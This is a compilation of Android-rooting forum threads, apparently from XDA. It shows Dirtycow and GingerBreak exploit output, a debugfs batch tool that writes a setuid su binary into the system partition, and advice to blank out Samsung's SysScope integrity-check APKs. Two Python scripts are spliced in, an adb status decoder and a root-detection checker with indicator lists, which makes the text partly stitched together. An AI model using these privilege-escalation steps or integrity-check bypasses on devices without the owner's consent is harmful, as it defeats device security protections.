Dirtycow still works on latest OTA KitKat - Samsung Galaxy S 4 Zoom

CVE-2016-5195 (aka dirtycow) still works on my recently updated and as yet unrooted AT&T branded SM-C105a Android 4.4.2 phone, despite the kernel being dated Jan 3 2017!
[email protected]:/data/local/tmp $ ./dcow /system/bin/run-as run-as
./dcow /system/bin/run-as run-as
dcow /system/bin/run-as run-as
warning: new file size (9436) and destination file size (13036) differ
[*] size 13036
[*] mmap 0x401dc000
[*] currently 0x401dc000=464c457f
[*] using ptrace method
[*] madvise = 0x401dc000 13036
[*] madvise = 0 16777216
[*] ptrace 0 2176
[*] exploited 23520 0x401dc000=464c457f
[*] exploited 0 0x401dc000=464c457f
255|[email protected]:/data/local/tmp $ ls -l /system/bin/run-as
ls -l /system/bin/run-as
-rwxr-x--- root shell 9436 2014-12-01 21:34 run-as
I'm still working on capturing the OTA. Sorry for the delay. c_p

Silly planit, of course they patched it! "Who wants to be a person who is wrong?"
When I run "make test" I get: adb shell 'cat /data/local/tmp/test2' yournotvulnerable
So, so much for that....I was hoping temporary root would be just the thing for kexec.

Are there any apps or codes, rooting apps or whatever, for a Samsung Galaxy sm-j260AAUCUIASV6, [OREO] ANDROID 8.1.0...?
ABIs: armeabi-v7a, armeabi
CPU Cores 4
CPU Bit: 32-Bit...
KNOX VERSION
KNOX 3.2
KNOX API level 26
TIMA 4.1.0
SAMSUNG EXPERIENCE VERS
9.5
Been at it for many days and I still can't find one that works; the web makes it look so easy, but yeah, and it's also Knox powered.... Any ideas? I pulled out some very lard cops and it used to belong to Sprint and AT&T and now I'm on Cricket...

Related

Rooting XXKG3 (2.3.4) - SuperOneClick won't work

Hello people!
As I'm fairly new to the whole android scene I'm having trouble understanding how I'm supposed to re-root my Galaxy S 2 after updating it to the most recent firmware. I do not want to replace the ROM at all as I'm quite content with the stock ROM and want to avoid random force closes/missing features, which is what I got in the last couple of custom ROMs.
I just want it rooted so that I can remove the bloatware Samsung bundle with the phone, and also to customise the usability of the phone (bootscreen, CRT effect, improved/silent camera etc).
However when using SuperOneClick 2.0 Beta 1 to try and root it, I get as far as:
SuperOneClick v2.0.0.0
Checking drivers…
Killing ADB Server…
OK
Starting ADB Server…
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
OK
Waiting for device…
OK
2.3.4
Getting manufacturer…
HTC
OK
Getting model…
Nexus One
OK
Getting version…
85805
OK
Checking if rooted…
False
OK
Rooting device… – Step #1
OK
Rooting device… – Step #2
OK
Rooting device… – Step #3
684 KB/s (16830 bytes in 0.024s)
OK
Rooting device… – Step #4
OK
Rooting device… – Step #5
$ cd /data/local/tmp/
$ ./GingerBreak
[**] Gingerbreak/Honeybomb — android 2.[2,3], 3.0 softbreak
[**] (C) 2010-2011 The Android Exploid Crew. All rights reserved.
[**] Kudos to jenzi, the #brownpants-party, the Open Source folks,
[**] Zynamics for ARM skills and Onkel Budi
[**] donate to (email) if you like
[**] Exploit may take a while!
[+] Plain Gingerbread mode!
[+] Found PT_DYNAMIC of size 232 (29 entries)
[+] Found GOT: 0x00014344
[+] Using device /devices/platform/goldfish_mmc.0
[*] vold: 0000 GOT start: 0x00014344 GOT end: 0x00014384
OK
Rooting device… – Step #6
OK
Rooting device… – Step #7
OK
Installing BusyBox (temporary)… – Step #1
1186 KB/s (1062992 bytes in 0.875s)
OK
Installing BusyBox (temporary)… – Step #2
OK
Getting mount path…
/dev/block/mtdblock3
OK
Remounting /system with read-write access…
mount: Operation not permitted
FAILED
I have tried searching other topics and they mention having to reflash with an unofficial ROM, but don't really link to which one, and I'm not sure if it retains the stock ROM in the way I want it to (aka untouched, just rooted so I can customise it myself).
Any assistance would be greatly appreciated!
You have to flash at least an insecure kernel for SuperOneClick to work on the SGS2.
You can also flash a kernel that takes care of all the rooting, like CF-Root or maybe even mine
Don't confuse this with flashing a complete custom ROM, it's only the kernel, but that one needs to be flashed in order to root.
Removed my post here as I found a kernel to use when I get home.
Thank you very much for the clarifications given.

Galaxy S III adb shell error

I was looking up the partition layout of the Galaxy S III while I stumbled upon this problem.
The first time you run a command in 'adb shell' everything is fine, but when you try to run a second command, it just hangs. It doesn't crash, it just hangs.
So, I tried to find out what could be wrong, by doing the following: Instead of going into the shell itself, I just entered a semi-random command 'adb shell mount', which returned the normal result.
Then, I typed 'adb shell' and guess what? It returns a commonly known error: 'error: protocol fault (status 72 6f 6f 74?!)'
The status code is HEX, which translates to: 'error: protocol fault (status root?!)'
So I suppose this has something to do with the fact that my SGS3 is rooted.
I don't feel like unrooting it, but if someone would be so kind to test this on an unrooted SGS3 and report back the results here so we can investigate this further that would be greatly appreciated.
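The "protocol fault (status 72 6f 6f 74?!)" text in the post is how the adb client reports a reply whose first four bytes are neither OKAY nor FAIL. The decoder below, an added example and not adb's own code, reproduces that framing: the client sends a 4-hex-digit length plus a service name, and the server answers with a 4-byte status word, FAIL being followed by a hex-length-prefixed message. The byte strings it is fed are constructed to reproduce the case in the post, where the four status bytes spell "root".

```python
"""Added example: a decoder for the 4-byte status word the adb server returns,
written to mirror the error text the adb client prints ("protocol fault
(status xx xx xx xx?!)"). It is not adb's own code; the byte strings below
are constructed to reproduce the case from the post."""


def encode_request(service: str) -> bytes:
    """Client-to-server framing: 4 lowercase hex digits of length, then the service name."""
    payload = service.encode()
    return f"{len(payload):04x}".encode() + payload


def decode_status(reply: bytes) -> dict:
    """Interpret the first 4 bytes of a server reply.

    OKAY  -> {"status": "OKAY", "rest": <remaining bytes>}
    FAIL  -> {"status": "FAIL", "message": <hex-length-prefixed string>}
    other -> {"status": "FAULT", "error": <adb-style text>, "as_text": <the 4 bytes as ASCII>}
    """
    if len(reply) < 4:
        return {"status": "FAULT", "error": "protocol fault (no status)", "as_text": ""}
    word, rest = reply[:4], reply[4:]
    if word == b"OKAY":
        return {"status": "OKAY", "rest": rest}
    if word == b"FAIL":
        # FAIL is followed by a 4-hex-digit length and then the error message itself
        try:
            length = int(rest[:4], 16)
        except ValueError:
            length = 0
        return {"status": "FAIL", "message": rest[4:4 + length].decode("utf-8", "replace")}
    # Anything else is a desynchronised stream: report the raw bytes the way adb does
    hexbytes = " ".join(f"{b:02x}" for b in word)
    return {
        "status": "FAULT",
        "error": f"protocol fault (status {hexbytes}?!)",
        "as_text": word.decode("ascii", "replace"),
    }


if __name__ == "__main__":
    # Constructed: prompt-like bytes arriving where the status word was expected
    print(decode_status(b"root@android:/ $ "))
    print(decode_status(b"FAIL0010device not found"))
```

Printing `as_text` beside the hex is the quick check the poster did by hand: a status word that reads as text from a shell prompt rather than OKAY/FAIL means the client and server have lost framing, which is a stream problem to investigate rather than a device error.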
it works without any error.
do you know what to backup which contains kernel and ramdisk ?
Mine is rooted, with Omega Rom V3 and everything works perfect with adb.
Cranck said:
Mine is rooted, with Omega Rom V3 and everything works perfect with adb.
Have you tried multiple shell commands? I know adb functions, but it's about using adb shell.
I'm on the stock rom, rooted manually with CF's insecure kernel by the way.
I'm not sure this is related, but there is some very suspicious new functionality in the FactoryTest.apk, called "SysScope". It's some kind of service checking and verifying the authenticity of "something". But I have no idea of what, only that a related Java file (ResultCode.class [sysscope.service]) contains the following code segment:
Code:
arrayOfResultCode[0] = OK;
arrayOfResultCode[1] = ADB_RUNNING_AS_ROOT;
arrayOfResultCode[2] = PARTITION_TAMPERED;
arrayOfResultCode[3] = ROOT_PROCESS_FOUND;
arrayOfResultCode[4] = DANGEROUS_FILE_DETECTED;
arrayOfResultCode[5] = NOT_OFFICIAL_BINARY;
Then it looks for SysScope files in the SysScopeVerifyer.class like this:
Code:
/data/app/com.sec.android.app.sysscope-1.apk
/data/app/com.sec.android.app.sysscope-2.apk
I suggest you back these up, and then replace them with empty files of the same name, and see what happens.
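The result codes in that segment are a compact description of what an on-device integrity check looks for: adbd running as root, a modified /system partition, a root shell, a dropped su or Superuser package, and a non-release build. The script below is an added illustration of such a checker and is not Samsung's SysScope code; the indicator paths, the root-shell list, the ro.build.type/ro.build.tags rule and every sample input (ps listing, file table, digests) are assumptions constructed here so it runs offline.

```python
"""Root and tamper checks modelled on the SysScope ResultCode values quoted
above. Added illustration, not Samsung's SysScope code: the indicator lists,
the ro.build.* rule and all sample inputs are assumptions constructed here."""
import stat
from dataclasses import dataclass

# Same order as the arrayOfResultCode[] segment in the post.
RESULT_CODES = ["OK", "ADB_RUNNING_AS_ROOT", "PARTITION_TAMPERED",
                "ROOT_PROCESS_FOUND", "DANGEROUS_FILE_DETECTED", "NOT_OFFICIAL_BINARY"]

# Assumed indicators: files a root kit typically drops, and shells that should
# never run as uid 0 on a production build.
DANGEROUS_PATHS = {"/system/xbin/su", "/system/bin/su", "/system/app/Superuser.apk"}
ROOT_SHELLS = {"sh", "su", "daemonsu"}


@dataclass(frozen=True)
class FileEntry:
    path: str
    mode: int     # full st_mode; 0o106755 is a regular file with mode 6755 (setuid+setgid)
    sha256: str   # hex digest; the values below are constructed


def parse_ps(ps_output: str):
    """Return (user, name) pairs from Android toolbox `ps` output (first and last column)."""
    rows = []
    for line in ps_output.strip().splitlines()[1:]:   # skip the header row
        cols = line.split()
        if len(cols) >= 2:
            rows.append((cols[0], cols[-1]))
    return rows


def check_adb_root(procs):
    return any(user == "root" and name.endswith("adbd") for user, name in procs)


def check_root_processes(procs):
    return any(user == "root" and name.rsplit("/", 1)[-1] in ROOT_SHELLS
               for user, name in procs)


def check_dangerous_files(files):
    for f in files:
        if f.path in DANGEROUS_PATHS:
            return True
        # 4755 and 6755 both set S_ISUID; neither belongs on anything under these trees
        if f.mode & (stat.S_ISUID | stat.S_ISGID) and f.path.startswith(("/data/", "/system/xbin/")):
            return True
    return False


def check_partition(files, manifest):
    """manifest maps /system paths to their official digests; an unknown file or a
    digest mismatch under /system means the partition was modified."""
    return any(f.path.startswith("/system/") and manifest.get(f.path) != f.sha256
               for f in files)


def check_official_binary(props):
    # A production build reports ro.build.type=user and ro.build.tags=release-keys.
    return props.get("ro.build.type") == "user" and props.get("ro.build.tags") == "release-keys"


def scan(ps_output, files, manifest, props):
    """Return the list of triggered result codes, or ["OK"] when nothing fires."""
    procs = parse_ps(ps_output)
    hits = [
        ("ADB_RUNNING_AS_ROOT", check_adb_root(procs)),
        ("PARTITION_TAMPERED", check_partition(files, manifest)),
        ("ROOT_PROCESS_FOUND", check_root_processes(procs)),
        ("DANGEROUS_FILE_DETECTED", check_dangerous_files(files)),
        ("NOT_OFFICIAL_BINARY", not check_official_binary(props)),
    ]
    return [code for code, fired in hits if fired] or ["OK"]


# Constructed sample inputs: a stock device and the same device after rooting.
STOCK_PS = """USER     PID   PPID  VSIZE  RSS     WCHAN    PC         NAME
root      1     0     376    240   c00c1ee8 0000e3f8 S /init
shell     123   1     3404   496   ffffffff 00000000 S /sbin/adbd
app_42    512   88    160000 30000 ffffffff 00000000 S com.android.phone
"""
ROOTED_PS = """USER     PID   PPID  VSIZE  RSS     WCHAN    PC         NAME
root      1     0     376    240   c00c1ee8 0000e3f8 S /init
root      123   1     3404   496   ffffffff 00000000 S /sbin/adbd
root      600   123   2200   300   ffffffff 00000000 S /system/bin/sh
"""
MANIFEST = {"/system/bin/sh": "aa" * 32, "/system/bin/toolbox": "bb" * 32}
STOCK_FILES = [FileEntry("/system/bin/sh", 0o100755, "aa" * 32),
               FileEntry("/system/bin/toolbox", 0o100755, "bb" * 32)]
ROOTED_FILES = STOCK_FILES + [FileEntry("/system/xbin/su", 0o106755, "cc" * 32)]
OFFICIAL_PROPS = {"ro.build.type": "user", "ro.build.tags": "release-keys"}

if __name__ == "__main__":
    print("stock :", scan(STOCK_PS, STOCK_FILES, MANIFEST, OFFICIAL_PROPS))
    print("rooted:", scan(ROOTED_PS, ROOTED_FILES, MANIFEST, OFFICIAL_PROPS))
```

The checks are deliberately independent so that each finding maps to one result code; a real implementation would take the manifest from the signed system image rather than a dictionary, and would read `ps`, the file table and the build properties from the device instead of the constructed strings above.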
I have the exact same problem on the GS2, OneX, and OneS. I have no problem shelling into the devices using another system, but on one of my computers I have the same issue. Windows 7 64bit with jdk7 installed.
Also, I enabled adb trace to see what was being returned: set ADB_TRACE=all
-Entering ls three times on the OneX, the first time works correctly
Code:
ls
system/core/adb/commandline.c::stdin_read_thread():stdin_read_thread(): post unix_read(fdi=0,...)
system/core/adb/commandline.c::stdin_read_thread():stdin_read_thread(): pre unix_read(fdi=0,...)
system/core/adb/commandline.c::read_and_dump():read_and_dump(): post adb_read(fd=101): len=5
ls
system/core/adb/commandline.c::read_and_dump():read_and_dump(): pre adb_read(fd=101)
system/core/adb/commandline.c::read_and_dump():read_and_dump(): post adb_read(fd=101): len=32
acct
cache
config
cwkeys
d
system/core/adb/commandline.c::read_and_dump():read_and_dump(): pre adb_read(fd=101)
system/core/adb/commandline.c::read_and_dump():read_and_dump(): post adb_read(fd=101): len=318
data
default.prop
dev
devlog
etc
firmware_dsps
firmware_q6
firmware_radio
firmware_wcnss
init
init.elite.rc
init.goldfish.rc
init.qcom.rc
init.qcom.sh
init.rc
init.target.rc
init.usb.rc
mnt
proc
root
sbin
sdcard
sys
system
tombstones
ueventd.goldfish.rc
ueventd.rc
vendor
[email protected]:/ $ system/core/adb/commandline.c::read_and_dump():read_and_dump(): pre adb_read(fd=101)
ls
system/core/adb/commandline.c::stdin_read_thread():stdin_read_thread(): post unix_read(fdi=0,...)
system/core/adb/commandline.c::stdin_read_thread():stdin_read_thread(): pre unix_read(fdi=0,...)
ls
system/core/adb/commandline.c::stdin_read_thread():stdin_read_thread(): post unix_read(fdi=0,...)
system/core/adb/commandline.c::stdin_read_thread():stdin_read_thread(): pre unix_read(fdi=0,...)

[ROOT][TOOL]Debugfs automated root [09/18/2012]

This tool will root your device based on the debugfs root method developed by miloj.
Just download and unzip everything into a directory, then run RootDebugfs.bat from that directory (if you do not currently have the device drivers for your Transformer, they are attached to this post; please install them and use them to install your device before attempting the process).
Neither ADB nor the SDK need to be installed as all needed files are included in the attachments below (though it won't hurt anything if they are).
Helpful tip:
Make sure no other Android device is connected to your PC
It should look familiar since I took PrimeTime and gutted it, only keeping the menu options. Thanks to viperboy for that.
Original post is in the TF300 thread, http://forum.xda-developers.com/showthread.php?t=1704209
UPDATE 6/12/2012:
v1.1 - Added donation link for miloj
v1.2 - Fixed bug that caused it to stop while doing "debugfs", to cancel press Ctrl+c
v1.3 - Fixed bug where the id is not returned from the su test
v1.4 - Fixed bug introduced with v1.3
v1.5 - Fixed bug where you don't have to push the apk before calling install
6/13/2012
v1.6 - Fixed messaging (this is a cosmetic change)
v1.7 - Added a remove call on su prior to rooting for those who had root previously and it no longer works
v1.8 - Change the octal permissions to be 6755 instead of 4755
7/2/2012
v1.9 - Update superuser app and binary to the latest version available
XDA uploads are not working currently so I have uploaded the new version to here for now
https://skydrive.live.com/redir?resid=DC89975E3CE960E5!221
8/5/2012
v2.0 - Updated to include a kill for Asus sync as that seemed to be the biggest issue.
I have also made it more generic so that it can root more devices with the same util. This is done by scanning for the system partition automatically, thanks to rightonred for that suggestion. With the attachment labeled "generic" I have removed all asus references and drivers since they were causing issues with me being able to attach the zip to xda. Anybody who needs the drivers can download them from asus or from another xda post.
v2.1 - Added a pause while waiting for the device to restart to alleviate that nuisance.
v2.2 - Added message to ignore "File not found" message when trying to delete old su versions. Also updated message with the generic locations of settings on the tablet.
8/12/2012
v2.3 - Update su binary file (hopefully it may help some of the people with superuser app issues)
ASUS drivers can be downloaded from the ASUS site but some are not provided other than through the sync install. I have extracted out the drivers from that sync install and attached them to this post. These drivers will support most of the Asus Eee Pad family including TF101, TF201, TF300, TF700, ME171(MeMO), A66(Padfone), SL101(Slider), and a couple others.
No longer need a PadFone specific root util as the generic one should work for it as well.
Here is a version I put together for the Galaxy SII (but the generic one attached here should work fine)
http://forum.xda-developers.com/showpost.php?p=27611187&postcount=3
Latest Supported Versions:
v9.2.1.27 for the TF101 (ICS 4.0.3)
v9.2.2.6 for the TF101G (ICS 4.0.3) (3G version)
v9.4.2.28 for the TF201 (ICS 4.0.3)
v9.4.3.30 for the TF300T (ICS 4.0.3)
v9.4.4.40 for the TF300TG (ICS 4.0.3) (3G version)
v9.4.5.30 for the TF700T (ICS 4.0.3)
v9.18.8.41 for the PadFone (ICS 4.0.3)
These are the latest supported versions as far as I know, if I get any further input I will update this post.
Reported UNsupported Versions
v10.4.2.15 for the TF201 (JB 4.1.1)
v10.4.2.9 for the TF300T (JB 4.1.1)
v10.4.4.16 for the TF700T (JB 4.1.1)
v9.20.1.22 for the PadFone (ICS 4.0.4)
Anyone confirmed? What's the risk if it doesn't work?
Currently in progress .... sitting at:
Step 2 - Rooting...
debugfs 1.42 (29-Nov-2011)
debugfs: (shows a flashing cursor)
My Prime has rebooted but still sitting at the above. Is this normal?
OK, now I'm getting nervous .... Anybody wanna help a Noob?
Aaronneal said:
Anyone confirmed? What's the risk if it doesn't work?
The risk if it doesn't work should just be that you wouldn't have root.
We already have confirmation that the method works (so there should be no risk there). We just don't have confirmation that I didn't make a typo or other mistake when putting it all together.
Gremlin001 said:
Currently in progress .... sitting at:
Step 2 - Rooting...
debugfs 1.42 (29-Nov-2011)
debugfs: (shows a flashing cursor)
My Prime has rebooted but still sitting at the above. Is this normal?
How long has it been sitting there?
This is one of the points where I wasn't sure about since I had to pass input to debugfs through adb.
sparkym3 said:
How long has it been sitting there?
This is one of the points where I wasn't sure about since I had to pass input to debugfs through adb.
Currently 7 minutes...
If my memory serves me correctly, this is the point where it can take 10 - 15 minutes. Is that correct?
---------- Post added at 01:27 PM ---------- Previous post was at 01:12 PM ----------
Nope ... left it stalled at "debugfs:" for 20 minutes.
Ctrl-C'd out of the batch file. Doesn't seem to have hurt the Prime.
Gremlin001 said:
Currently 7 minutes...
If my memory serves me correctly, this is the point where it can take 10 - 15 minutes. Is that correct?
---------- Post added at 01:27 PM ---------- Previous post was at 01:12 PM ----------
Nope ... left it stalled at "debugfs:" for 20 minutes.
Ctrl-C'd out of the batch file. Doesn't seem to have hurt the Prime.
That's what I was going to tell you. I have an update that I will put up; I just forgot to put the absolute location. Please stand by.
Standing by ...
Now?
Now?
How 'bout now??
Maybe now?
Please try again. New version is v1.2
Running the updated bat as I type.... stand by
update #1 - sitting at the same spot.
Is it possible some of the files in the zip need to be in the MS-Win system32 folder?
sparkym3- you have a quick link to the win driver installation tutorial? Gonna try this but haven't used Windows in years. Got a lappy with xp on it.
texstar said:
sparkym3- you have a quick link to the win driver installation tutorial? Gonna try this but haven't used Windows in years. Got a lappy with xp on it.
Plug your prime into the computer with the Asus usb cable. When the Autoinstall drivers dialogue pops up, tell it you want to select the drivers. when it asks you to browse to the drivers, browse to the location where you unzipped sparky's and select it. WinXP does the rest.
Gremlin001 said:
Running the updated bat as I type.... stand by
update #1 - sitting at the same spot.
Is it possible some of the files in the zip need to be in the MS-Win system32 folder?
Can you tell me what the console displays after these lines? That should tell if all the files got copied over to the device.
adb push debugfs /data/local/
adb push debugfsinput /data/local/
Since debugfs actually runs, at least that one is copied over, my main concern is debugfsinput, this is the file that tells debugfs what to do.
Also, would you post a screenshot so I can see exactly what is happening, something might jump out if I can actually see it.
Screen shot won't do any good. Lettering is very dark. Here is a select all/copy of the output.
Waiting for device to be detected...
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
Step 1 - Pushing files...
843 KB/s (1862336 bytes in 2.156s)
698 KB/s (22364 bytes in 0.031s)
7 KB/s (119 bytes in 0.015s)
Rebooting...
Step 2 - Rooting...
debugfs 1.42 (29-Nov-2011)
debugfs:
I'm exiting the batch file.
Gremlin001 said:
Screen shot won't do any good. Lettering is very dark. Here is a select all/copy of the output.
Waiting for device to be detected...
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
Step 1 - Pushing files...
843 KB/s (1862336 bytes in 2.156s)
698 KB/s (22364 bytes in 0.031s)
7 KB/s (119 bytes in 0.015s)
Rebooting...
Step 2 - Rooting...
debugfs 1.42 (29-Nov-2011)
debugfs:
I'm exiting the batch file.
Would you just run this line manually and see if you get the same?
adb shell "/data/local/debugfs -w /dev/block/mmcblk0p1 < /data/local/debugfsinput"
I wish I had my Prime so I could test; all I have with me is an emulator.
On the emulator I get errors, but it still runs the correct commands then exits.
C:\Android\android-sdk\platform-tools>adb shell "/data/local/debugfs -w /dev/block/mmcblk0p1 < /data/local/debugfsinput"
debugfs 1.42 (29-Nov-2011)
/dev/block/mtdblock0: Attempt to read block from filesystem resulted in short read while opening filesystem
debugfs: cd: Filesystem not open
debugfs: write: Filesystem not open
debugfs: set_inode_field: Filesystem not open
debugfs: set_inode_field: Filesystem not open
debugfs: set_inode_field: Filesystem not open
debugfs:
C:\Android\android-sdk\platform-tools>
C:\Documents and Settings\kcr\Desktop\Root>adb shell "/data/local/debugfs -w /de
v/block/mmcblk0p1 < /data/local/debugfsinput"
debugfs 1.42 (29-Nov-2011)
debugfs: debugfs: write: The file 'su' already exists
debugfs: debugfs: debugfs: debugfs:
C:\Documents and Settings\kcr\Desktop\Root>
Then it exits to dos shell
---------- Post added at 02:22 PM ---------- Previous post was at 02:14 PM ----------
Gotta run sparky. I'll be back to try again in about 4 hours. Thanks for giving it a go and setting up the bat. It will likely be something simple messing up - it usually is.
Gremlin001 said:
C:\Documents and Settings\kcr\Desktop\Root>adb shell "/data/local/debugfs -w /de
v/block/mmcblk0p1 < /data/local/debugfsinput"
debugfs 1.42 (29-Nov-2011)
debugfs: debugfs: write: The file 'su' already exists
debugfs: debugfs: debugfs: debugfs:
C:\Documents and Settings\kcr\Desktop\Root>
Then it exits to dos shell
If the file already exists, then that may be a problem.
You could try this to remove the existing file:
Code:
adb shell
/data/local/debugfs -w /dev/block/mmcblk0p1
rm /xbin/su
quit
exit
This should clear out any current su file that's in there and then try that line again.
Hopefully somebody else can come in and confirm they are seeing the same because I am useless for trying things without my device.
sparkym3 said:
Latest Supported Versions:
v9.4.2.21 for the TF201
v9.2.1.17 for the TF101
v9.4.3.29 for the TF300
These are the latest supported versions as far as I know, if I get any further input I will update this post.
The latest update for TF201 v9.4.2.28/29 due out within a day or 2 has been reported to not have any of the known root exploits, do NOT upgrade to the latest build prior to rooting or you may be out of luck.
I'm already out of luck
so i can't even downgrade either, if I wanted to, huh? .28 blues..lol
Ok I'm in if you are still around sparkym3.
Running v1.3 bat gets me to...
Step 2 -- Rooting...
debugfs 1.42
debugfs: Allocated inode: 1369
debugfs: su: File not found by ext2_loopback
debugfs: su: File not found by ext2_loopback
debugfs: su: File not found by ext2_loopback
debugfs:
Rebooting...
Testing superuser...
/system/bin/sh: /system/xbin/su: not found
uid and gid should both be 0.
Are they? (y/n):
I'm stopped here. not sure how to proceed.

[Q] Rooting the Fusion 2

Can anyone advise if the Huawei U8665 (AT&T Fusion 2) can be rooted? It has Android version 2.3.6. I tried with the easy SuperOneClick approach but it didn't work; it wouldn't recognize the device. Thanks.
ptbear said:
Can anyone advise if the Huawei U8665 (AT&T Fusion 2) can be rooted? It has Android version 2.3.6. I tried with the easy SuperOneClick approach but it didn't work; it wouldn't recognize the device. Thanks.
Did you ever figure out how to root?
Why don't you Google other Huawei devices running Gingerbread and look for a root kit?
Sent from my LGL35G using xda premium
903tex said:
Why don't you Google other Huawei devices running Gingerbread and look for a root kit?
Sent from my LGL35G using xda premium
I have, and I haven't been able to find anything. SuperOneClick, z4root and Unlock Root only work for 2.3, and the Fusion 2 is running 2.3.6; while trying to use those tools to root, it always hangs when trying to gain shell root.
Have to wait till somebody with skills makes an exploit for the Fusion.
Sent from my LGL35G using xda premium
Patience is a virtue, I suppose. I should've just bought a Galaxy Player, I guess.
I seem to have acquired root, but I had to use fastboot to restore the ROM. Sorry I can't be more specific because this touchscreen took a hard fall..... Post later, thx -RFE
RFE said:
I seem to have acquired root, but I had to use fastboot to restore the ROM. Sorry I can't be more specific because this touchscreen took a hard fall..... Post later, thx -RFE
I keep posting to the wrong threads. Sorry.
Hint hint....... you need the diag drivers, which are not posted, but I should have a recovery img ready soon (one that re-installs SU on each boot).
RFE said:
I keep posting to the wrong threads. Sorry.
Hint hint....... you need the diag drivers, which are not posted, but I should have a recovery img ready soon (one that re-installs SU on each boot).
These are the right drivers for adb.
RFE said:
These are the right drivers for adb.
hi guys, here is a copy of the latest and greatest adb driver sets. with this driver set (folder called 'Driver' if you don't need adb).
I now HAVE ROOT on the phone by using fastboot and modifying the recovery image. I will post these once I strip it of all my personal info. Please try your own methods as well. I have attached a screenshot of what your (x86) device manager should look like once you correctly installed the drivers.
Best wishes & happy rooting
RFE said:
hi guys, here is a copy of the latest and greatest adb driver sets. with this driver set (folder called 'Driver' if you don't need adb).
I now HAVE ROOT on the phone by using fastboot and modifying the recovery image. I will post these once I strip it of all my personal info. Please try your own methods as well. I have attached a screenshot of what your (x86) device manager should look like once you correctly installed the drivers.
Best wishes & happy rooting
Here is a clip of adb working. I am trying to get ClockworkMod working, but it is difficult because of all this new 2.3.6 security (my last phone was a 2.3.4).
D:\android-sdk-windows\platform-tools>adb tcpip 8888
restarting in TCP mode port: 8888
D:\android-sdk-windows\platform-tools>adb root
error: device not found
D:\android-sdk-windows\platform-tools>adb usb
error: device not found
D:\android-sdk-windows\platform-tools>adb get-state
unknown
D:\android-sdk-windows\platform-tools>adb shell
$ exit
exit
D:\android-sdk-windows\platform-tools>adb reboot-bootloader
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
D:\android-sdk-windows\platform-tools>adb root
adbd cannot run as root in production builds
(you must copy certain files to the device via adb push/pull & you can have root too)
---------- Post added at 04:14 PM ---------- Previous post was at 03:46 PM ----------
I dumped the entire phone in user mode and this is what you get:
(let me know if you need anything)
Device connected.
Default pull path saved.
Detailed phone info: RECOVERY ACTIVE
Pulling file or directory from data/app/... successful.
Pulling file or directory from data/app_private/... failed.
Pulling file or directory from data/data/... successful.
Pulling file or directory from data/local/... successful.
Pulling file or directory from data/nv/... failed.
Pulling file or directory from data/system/... successful.
Pulling file or directory from system/app/... failed.
Pulling file or directory from system/bin/... successful.
Pulling file or directory from system/etc/init.d/... failed.
Pulling file or directory from system/fonts/... successful.
Pulling file or directory from system/framework/... successful.
Pulling file or directory from system/media/... successful.
Pulling file or directory from system/usr/keylayout/... successful.
\android-sdk-windows\f2pull1
05 <DIR> .
05 <DIR> ..
56 1,697 7k_handset.kl
56 3,894 7x27a_kp.kl
43,652 abtfilt
51 0 accounts.db-journal
55,168 akmd8962
55,168 akmd8975
191 am
313 am.jar
27,864 am.odex
5,520 amploader
313 android.policy.jar
248,448 android.policy.odex
313 android.test.runner.jar
193,944 android.test.runner.odex
58,132 applypatch
5,720 app_process
71,736 ast-mm-vdec-omx-test7k
17,076 ATFWD-daemon
24,064 athtestcmd
631,588 ath_supplicant
<DIR> audio
56 245 AVRCP.kl
5,504 battery_charging
5,292 bluetoothd
199 bmgr
313 bmgr.jar
13,784 bmgr.odex
23,208 bootanimation
23,192 bootanimationex
313 bouncycastle.jar
778,624 bouncycastle.odex
10,196 brcm_patchram_plus
33,428 bridgemgrd
380,435 btld
5,556 bugreport
5,360 callife
145,156 charge
14,404 CKPD-daemon
6,880 Clockopia.ttf
22,788 cnd
313 com.android.location.provider.jar
7,352 com.android.location.provider.odex
1,671 com.cequint.platform.jar
1,984 com.cequint.platform.odex
313 com.google.android.maps.jar
388,168 com.google.android.maps.odex
313 com.qualcomm.location.vzw_library.jar
46,000 com.qualcomm.location.vzw_library.odex
120,332 compassd
313 core-junit.jar
23,952 core-junit.odex
22,926 core.jar
4,801,784 core.odex
5,520 dalvikvm
109,504 dbus-daemon
18,112 debuggerd
9,796 dexopt
44,612 dhcpcd
102,056 dhd
5,648 diag_klog
5,568 diag_mdlog
108,820 dnsmasq
194,488 DroidSans-Bold.ttf
190,776 DroidSans.ttf
35,880 DroidSansArabic.ttf
3,725,920 DroidSansFallback.ttf
23,076 DroidSansHebrew.ttf
119,380 DroidSansMono.ttf
36,028 DroidSansThai.ttf
185,228 DroidSerif-Bold.ttf
190,304 DroidSerif-BoldItalic.ttf
177,560 DroidSerif-Italic.ttf
172,916 DroidSerif-Regular.ttf
56,468 ds_fmc_appd
34,544 dumpstate
9,812 dumpsys
5,548 dvz
204,900 e2fsck
313 ext.jar
1,393,000 ext.odex
06 60,920,794 fastboot-tools-full-copy-HUAWEI-U8665-EN-NONIG
rar
9,968 filebackup
14,084 fmconfig
360,282 framework-res-hwext.apk
10,368,022 framework-res.apk
12,413 framework.jar
9,007,376 framework.odex
22,640 fsck_msdos
35,028 ftmdaemon
5,604 gzip
27,652 hciattach
5,684 hci_dev_state
277,652 hostapd
22,420 hostapd_cli
5,440 hostapd_wps
9,920 hwvefs
194 ime
313 ime.jar
6,720 ime.odex
201 input
313 input.jar
4,408 input.odex
18,324 installd
133,556 ip
36,052 iperf
216,188 ipth_dua
313 javax.obex.jar
60,848 javax.obex.odex
10,112 keystore
9,692 kmsgcat
39,416 linker
13,952 load_oemlogo
44,484 loc_api_app
14,052 logcat
9,760 logwrapper
5,504 mediaserver
17,408 mm-abl-daemon
13,184 mm-abl-test
18,092 mm-adec-omxaac-test
22,156 mm-adec-omxadpcm-test
22,172 mm-adec-omxamr-test
22,288 mm-adec-omxamrwb-test
22,236 mm-adec-omxevrc-hw-test
26,172 mm-adec-omxmp3-test
22,236 mm-adec-omxQcelpHw-test
22,268 mm-adec-omxvam-test
22,204 mm-adec-omxwma-test
5,532 mm-adspsvc-test
18,108 mm-aenc-omxaac-test
13,852 mm-aenc-omxamr-test
18,252 mm-aenc-omxevrc-test
18,252 mm-aenc-omxqcelp13-test
5,408 mm-audio-alsa-test
15,996 mm-audio-ctrl-test
5,552 mm-audio-mvs-test
88,820 mm-audio-native-test
22,188 mm-jpeg-dec-test
18,096 mm-jpeg-enc-test
5,456 mm-qcamera-daemon
62,308 mm-qcamera-test
